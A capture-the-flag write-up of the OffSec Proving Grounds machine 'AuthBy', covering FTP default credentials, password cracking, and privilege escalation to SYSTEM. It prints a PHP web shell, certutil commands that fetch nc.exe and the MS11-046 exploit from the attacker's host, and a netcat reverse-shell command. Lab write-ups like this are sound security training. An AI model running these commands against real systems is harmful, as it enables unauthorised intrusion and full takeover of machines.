AuthBy

Writeup for AuthBy from offsec Proving Grounds

Information Gathering

sudo ./nmapAutomator.sh 192.168.216.46 all

Service Enumeration

FTP (Port 21)

We see that there are a few accounts: Offsec, anonymous, and admin.

Looks like admin:admin gives us access to some files.

We can download any file we have access to using:

wget -m ftp://admin:admin@192.168.216.46

Looks like .htpasswd contains login credentials for offsec user account.

We use john here to crack it.

From here, we get offsec:elite for HTTP server on port 242.

HTTP (Port 242)

Exploit

We can transfer our shell.php which contains the following:

shell.php

<?php system($_GET['cmd']);?>

We then transfer nc.exe to the target machine.

http://192.168.216.46:242/shell.php?cmd=certutil%20-urlcache%20-split%20-f%20http://192.168.49.216/home/kali/pg/authby/payloads/nc.exe%20nc.exe

Now that we have nc.exe on the target machine, we can get our reverse shell.

nc.exe -e cmd.exe 192.168.49.216 80

Privesc

We can transfer winPEAS to the target machine and run it.

Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)Exploit Database

windows-kernel-exploits/MS11-046 at master · SecWiki/windows-kernel-exploitsGitHub

We can transfer the exploit to the target machine using the following command:

cmd.exe /c certutil -urlcache -split -f http://192.168.49.216/home/kali/pg/authby/windows-kernel-exploits/MS11-046/ms11-046.exe ms11-046.exe

We run the executable, and we get SYSTEM.